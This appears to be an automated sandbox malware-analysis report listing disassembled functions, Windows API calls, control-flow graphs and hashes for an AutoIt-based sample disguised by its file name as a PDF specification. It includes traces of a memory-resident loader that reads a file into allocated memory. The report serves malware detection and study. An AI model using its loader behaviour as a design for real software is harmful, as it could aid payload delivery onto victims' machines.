                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: @
                                      • API String ID: 3964851224-124383662
                                      • Opcode ID: d0303b1acc15930337f71cee4588213bc96f3c7c93b274a4c99b7d8145a1287b
                                      • Instruction ID: 559e33b1706b99c9592b70b5e1a2d8a328ce2dfc568b5e0e849286706b22eda1
                                      • Opcode Fuzzy Hash: d0303b1acc15930337f71cee4588213bc96f3c7c93b274a4c99b7d8145a1287b
                                      • Instruction Fuzzy Hash: 8F929B706083418FD726DF18C480F6AB7E5BF88348F15885DE98A8B762D771ED49CB92
                                      Function 0034E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034E959
                                      • timeGetTime.WINMM ref: 0034EBFA
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034ED2E
                                      • TranslateMessage.USER32(?), ref: 0034ED3F
                                      • DispatchMessageW.USER32(?), ref: 0034ED4A
                                      • LockWindowUpdate.USER32(00000000), ref: 0034ED79
                                      • DestroyWindow.USER32 ref: 0034ED85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0034ED9F
                                      • Sleep.KERNEL32(0000000A), ref: 003B5270
                                      • TranslateMessage.USER32(?), ref: 003B59F7
                                      • DispatchMessageW.USER32(?), ref: 003B5A05
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003B5A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                      • API String ID: 2641332412-570651680
                                      • Opcode ID: 04301f373214fc6dc52ddd8acfcb4a572ce2862254fc31192224a17a236b4d7d
                                      • Instruction ID: beb1ec2c9451e47394b9d442a189793fba7a4734bbac49387f4290ca8c2b38c8
                                      • Opcode Fuzzy Hash: 04301f373214fc6dc52ddd8acfcb4a572ce2862254fc31192224a17a236b4d7d
                                      • Instruction Fuzzy Hash: 8D62B070508340DFDB26DF24C885BAA77E8BF45304F04497DFA869F6A2DB75A848CB52
                                      Function 00343F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00343F86
                                      • RegisterClassExW.USER32(00000030), ref: 00343FB0
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00343FC1
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00343FDE
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00343FEE
                                      • LoadIconW.USER32(000000A9), ref: 00344004
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00344013
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: f80101c7f65b2713eea8450ba10a26070d18b024f7643de19f7e61b6307807af
                                      • Instruction ID: 0deda29dace51c6f5087e468232a98cac97113b7fdadd831e53ab1414084c8b4
                                      • Opcode Fuzzy Hash: f80101c7f65b2713eea8450ba10a26070d18b024f7643de19f7e61b6307807af
                                      • Instruction Fuzzy Hash: 1821C3B5D00218AFDB01DFA4ED89BCDBBB8FB08704F00462AFA15F62A0D7B555448F95
                                      Function 00343742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 538 343742-343762 540 343764-343767 538->540 541 3437c2-3437c4 538->541 543 3437c8 540->543 544 343769-343770 540->544 541->540 542 3437c6 541->542 545 3437ab-3437b3 DefWindowProcW 542->545 546 3437ce-3437d1 543->546 547 3b1e00-3b1e2e call 342ff6 call 35e312 543->547 548 343776-34377b 544->548 549 34382c-343834 PostQuitMessage 544->549 551 3437b9-3437bf 545->551 552 3437f6-34381d SetTimer RegisterWindowMessageW 546->552 553 3437d3-3437d4 546->553 581 3b1e33-3b1e3a 547->581 555 3b1e88-3b1e9c call 384ddd 548->555 556 343781-343783 548->556 550 3437f2-3437f4 549->550 550->551 552->550 561 34381f-34382a CreatePopupMenu 552->561 558 3b1da3-3b1da6 553->558 559 3437da-3437ed KillTimer call 343847 call 34390f 553->559 555->550 575 3b1ea2 555->575 562 343836-343845 call 35eb83 556->562 563 343789-34378e 556->563 568 3b1da8-3b1daa 558->568 569 3b1ddc-3b1dfb MoveWindow 558->569 559->550 561->550 562->550 564 343794-343799 563->564 565 3b1e6d-3b1e74 563->565 573 3b1e58-3b1e68 call 3855bd 564->573 574 34379f-3437a5 564->574 565->545 580 3b1e7a-3b1e83 call 37a5f3 565->580 577 3b1dcb-3b1dd7 SetFocus 568->577 578 3b1dac-3b1daf 568->578 569->550 573->550 574->545 574->581 575->545 577->550 578->574 582 3b1db5-3b1dc6 call 342ff6 578->582 580->545 581->545 586 3b1e40-3b1e53 call 343847 call 344ffc 581->586 582->550 586->545
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 003437B3
                                      • KillTimer.USER32(?,00000001), ref: 003437DD
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00343800
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0034380B
                                      • CreatePopupMenu.USER32 ref: 0034381F
                                      • PostQuitMessage.USER32(00000000), ref: 0034382E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: 3923b721de594c77f18c1ce20d472bc42e6122b22f2a1a4cf9fcdad7d4fc0948
                                      • Instruction ID: b785c39d9c0028f5c44d7fda5d52794be18fab22e2ff98e0e055402a8036320e
                                      • Opcode Fuzzy Hash: 3923b721de594c77f18c1ce20d472bc42e6122b22f2a1a4cf9fcdad7d4fc0948
                                      • Instruction Fuzzy Hash: A74128F1104245A7DB176B689D4AFBA3AD9F704300F400135FA82EF9E1CB75BE509766
                                      Function 00343E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00343E79
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00343E88
                                      • LoadIconW.USER32(00000063), ref: 00343E9E
                                      • LoadIconW.USER32(000000A4), ref: 00343EB0
                                      • LoadIconW.USER32(000000A2), ref: 00343EC2
                                        • Part of subcall function 00344024: LoadImageW.USER32(00340000,00000063,00000001,00000010,00000010,00000000), ref: 00344048
                                      • RegisterClassExW.USER32(?), ref: 00343F30
                                        • Part of subcall function 00343F53: GetSysColorBrush.USER32(0000000F), ref: 00343F86
                                        • Part of subcall function 00343F53: RegisterClassExW.USER32(00000030), ref: 00343FB0
                                        • Part of subcall function 00343F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00343FC1
                                        • Part of subcall function 00343F53: InitCommonControlsEx.COMCTL32(?), ref: 00343FDE
                                        • Part of subcall function 00343F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00343FEE
                                        • Part of subcall function 00343F53: LoadIconW.USER32(000000A9), ref: 00344004
                                        • Part of subcall function 00343F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00344013
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: 167f9b0ba66f416378e67e6aebd09129ad25c19e9fc4a80a6fd35123a825fb64
                                      • Instruction ID: 2f27ed00f3e4d5891fdca08c945ff3753f6e8bedd5911421caa425f091fe50ba
                                      • Opcode Fuzzy Hash: 167f9b0ba66f416378e67e6aebd09129ad25c19e9fc4a80a6fd35123a825fb64
                                      • Instruction Fuzzy Hash: E92130B0D00304ABCB05DFA9ED49A99BFF9FB48310F00813AE618BB2B1D77556448F95
                                      Function 0036EE0E Relevance: 15.7, APIs: 10, Instructions: 664COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f4786460929e380cfd05bc590e49aeefb9e9be0bce2a36194ea2b8a4c400ac0
                                      • Instruction ID: 7982f89b94e7034394e6b2e5c34623501d5caa7140e586dab9b9983684c98c2d
                                      • Opcode Fuzzy Hash: 8f4786460929e380cfd05bc590e49aeefb9e9be0bce2a36194ea2b8a4c400ac0
                                      • Instruction Fuzzy Hash: D3325874A04241DFDB23CF68E840BBD7BB1AF46314F29C16AE955AF29AC7709C41CB60
                                      Function 00375C78 Relevance: 12.9, APIs: 6, Strings: 1, Instructions: 626COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00375F2D
                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00375F47
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00375F6A
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00375F7C
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00376342
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0037636E
                                        • Part of subcall function 0036EA9C: CloseHandle.KERNELBASE(00000000,003EEEF4,00000000,?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAEC
                                        • Part of subcall function 0036EA9C: GetLastError.KERNEL32(?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CloseHandle$FileType
                                      • String ID: @
                                      • API String ID: 604914513-2766056989
                                      • Opcode ID: 9977dbb998d532c17ad273c24f4c408783e4c30a52a5b3e353a1c0751ca39520
                                      • Instruction ID: 83fb7e285a1d91a72dae130cf0d9d13f7ebb1b6d9a090252230ef11ab5754a0c
                                      • Opcode Fuzzy Hash: 9977dbb998d532c17ad273c24f4c408783e4c30a52a5b3e353a1c0751ca39520
                                      • Instruction Fuzzy Hash: 6D224771904A059FEB3B9F68CC56BBD7B61EB14314F25C228E519AB2D2C37D8D40CB91
                                      Function 0038BFA4 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 316fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1040 38bfa4-38c054 call 36f8a0 call 35f4ea call 3447b7 call 38bdb4 call 344517 call 3615e3 1053 38c05a-38c061 call 38c56d 1040->1053 1054 38c107-38c10e call 38c56d 1040->1054 1059 38c110-38c112 1053->1059 1060 38c067-38c105 call 361dfc call 360d23 call 360cf4 call 361dfc call 360cf4 * 2 1053->1060 1054->1059 1061 38c117 1054->1061 1062 38c367-38c368 1059->1062 1064 38c11a-38c1d6 call 3444ed * 8 call 38c71a call 363499 1060->1064 1061->1064 1065 38c385-38c393 call 3447e2 1062->1065 1099 38c1d8-38c1da 1064->1099 1100 38c1df-38c1fa call 38bdf8 1064->1100 1099->1062 1103 38c28c-38c298 call 3635e4 1100->1103 1104 38c200-38c208 1100->1104 1111 38c29a-38c2a9 1103->1111 1112 38c2ae-38c2b2 1103->1112 1105 38c20a-38c20e 1104->1105 1106 38c210 1104->1106 1108 38c215-38c233 call 3444ed 1105->1108 1106->1108 1118 38c25d-38c273 call 38b791 call 362aae 1108->1118 1119 38c235-38c23b 1108->1119 1111->1062 1114 38c2b8-38c32f call 38c81d call 38c845 call 38b965 1112->1114 1115 38c342-38c356 CopyFileW 1112->1115 1117 38c36a-38c380 call 38c6d9 1114->1117 1139 38c331-38c340 1114->1139 1116 38c358-38c365 1115->1116 1115->1117 1116->1062 1117->1065 1135 38c278-38c283 1118->1135 1122 38c23d-38c250 call 38bf2e 1119->1122 1136 38c252-38c25b 1122->1136 1135->1104 1138 38c289 1135->1138 1136->1118 1138->1103 1139->1062
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0038C2A1
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0038C338
                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0038C34E
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0038C35F
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0038C371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$Delete$Copy
                                      • String ID: p1Kw`KLw
                                      • API String ID: 3226157194-1011832795
                                      • Opcode ID: 6eb0aafd265052c9627ba9bac05517b7c6f9af0b39ffc9fe82b2541ad4b2ee0e
                                      • Instruction ID: d475434a2d69d191c6974367186c10fbd553942a8890b3995645e6773e26bd41
                                      • Opcode Fuzzy Hash: 6eb0aafd265052c9627ba9bac05517b7c6f9af0b39ffc9fe82b2541ad4b2ee0e
                                      • Instruction Fuzzy Hash: CAC10AB1910219AFDF12EF95CC85EDEB7BDAF49310F1080A6F609EA151DB70AA448F61
                                      Function 020E25D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1141 20e25d0-20e267e call 20e0000 1144 20e2685-20e26ab call 20e34e0 CreateFileW 1141->1144 1147 20e26ad 1144->1147 1148 20e26b2-20e26c2 1144->1148 1149 20e27fd-20e2801 1147->1149 1156 20e26c9-20e26e3 VirtualAlloc 1148->1156 1157 20e26c4 1148->1157 1150 20e2843-20e2846 1149->1150 1151 20e2803-20e2807 1149->1151 1153 20e2849-20e2850 1150->1153 1154 20e2809-20e280c 1151->1154 1155 20e2813-20e2817 1151->1155 1158 20e28a5-20e28ba 1153->1158 1159 20e2852-20e285d 1153->1159 1154->1155 1160 20e2819-20e2823 1155->1160 1161 20e2827-20e282b 1155->1161 1162 20e26ea-20e2701 ReadFile 1156->1162 1163 20e26e5 1156->1163 1157->1149 1166 20e28bc-20e28c7 VirtualFree 1158->1166 1167 20e28ca-20e28d2 1158->1167 1164 20e285f 1159->1164 1165 20e2861-20e286d 1159->1165 1160->1161 1168 20e282d-20e2837 1161->1168 1169 20e283b 1161->1169 1170 20e2708-20e2748 VirtualAlloc 1162->1170 1171 20e2703 1162->1171 1163->1149 1164->1158 1174 20e286f-20e287f 1165->1174 1175 20e2881-20e288d 1165->1175 1166->1167 1168->1169 1169->1150 1172 20e274f-20e276a call 20e3730 1170->1172 1173 20e274a 1170->1173 1171->1149 1181 20e2775-20e277f 1172->1181 1173->1149 1177 20e28a3 1174->1177 1178 20e288f-20e2898 1175->1178 1179 20e289a-20e28a0 1175->1179 1177->1153 1178->1177 1179->1177 1182 20e27b2-20e27c6 call 20e3540 1181->1182 1183 20e2781-20e27b0 call 20e3730 1181->1183 1189 20e27ca-20e27ce 1182->1189 1190 20e27c8 1182->1190 1183->1181 1191 20e27da-20e27de 1189->1191 1192 20e27d0-20e27d4 CloseHandle 1189->1192 1190->1149 1193 20e27ee-20e27f7 1191->1193 1194 20e27e0-20e27eb VirtualFree 1191->1194 1192->1191 1193->1144 1193->1149 1194->1193
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 020E26A1
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 020E28C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                      • Instruction ID: 6f68da8eaab5066426618bc78d248b13a2b082eb8d1fab38e4256b9b403aab0e
                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                      • Instruction Fuzzy Hash: 72A1F574E01209EFDF14CFA4C995BEEBBB9BF48304F208159E512BB280D7759A81DB54
                                      Function 003449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1250 3449fb-344a25 call 34bcce RegOpenKeyExW 1253 3b41cc-3b41e3 RegQueryValueExW 1250->1253 1254 344a2b-344a2f 1250->1254 1255 3b4246-3b424f RegCloseKey 1253->1255 1256 3b41e5-3b4222 call 35f4ea call 3447b7 RegQueryValueExW 1253->1256 1261 3b423d-3b4245 call 3447e2 1256->1261 1262 3b4224-3b423b call 346a63 1256->1262 1261->1255 1262->1261
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00344A1D
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003B41DB
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003B421A
                                      • RegCloseKey.ADVAPI32(?), ref: 003B4249
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpen
                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                      • API String ID: 1586453840-614718249
                                      • Opcode ID: 08bfb66b85a6b29ed4ff1a7896cb4d3cfb899b70bce90a1d76887788181691cf
                                      • Instruction ID: 83aecc328673749cf21872a1dcdedc84091510207cd45b0767f8a64b1e0595bd
                                      • Opcode Fuzzy Hash: 08bfb66b85a6b29ed4ff1a7896cb4d3cfb899b70bce90a1d76887788181691cf
                                      • Instruction Fuzzy Hash: 30113071600118BEDB06ABA8DD86DEF7BBCEF04344F104465F506DB1A1EA70AE029750
                                      Function 003436B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1277 3436b8-343728 CreateWindowExW * 2 ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003436E6
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343707
                                      • ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 0034371B
                                      • ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 00343724
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: da2d54dc00111232066e91e77f11d65441b8cdcab9fab127442291f42032d7fa
                                      • Instruction ID: 4469ade2387670fb44cd185170a343d3c8fc81b2b1fa9add48383e17fba4a829
                                      • Opcode Fuzzy Hash: da2d54dc00111232066e91e77f11d65441b8cdcab9fab127442291f42032d7fa
                                      • Instruction Fuzzy Hash: 29F03A755402D07AE7325B57AD88E673EBDD7C6F20F01802FBA04A22B0C5711891CAB4
                                      Function 020E23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1382 20e23b0-20e24cf call 20e0000 call 20e22a0 CreateFileW 1389 20e24d6-20e24e6 1382->1389 1390 20e24d1 1382->1390 1393 20e24ed-20e2507 VirtualAlloc 1389->1393 1394 20e24e8 1389->1394 1391 20e2586-20e258b 1390->1391 1395 20e250b-20e2522 ReadFile 1393->1395 1396 20e2509 1393->1396 1394->1391 1397 20e2526-20e2560 call 20e22e0 call 20e12a0 1395->1397 1398 20e2524 1395->1398 1396->1391 1403 20e257c-20e2584 ExitProcess 1397->1403 1404 20e2562-20e2577 call 20e2330 1397->1404 1398->1391 1403->1391 1404->1403
                                      APIs
                                        • Part of subcall function 020E22A0: Sleep.KERNELBASE(000001F4), ref: 020E22B1
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 020E24C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: ENMGDWYS3HUAY
                                      • API String ID: 2694422964-3732406215
                                      • Opcode ID: 594f6e6ae480bfa0264789d13bf927a2107544a31228aa9261d6ca896fde7626
                                      • Instruction ID: 2d4552e55f839a0dfe06df12571db50b07411bfbd380be1bffcbdc18d90d45b5
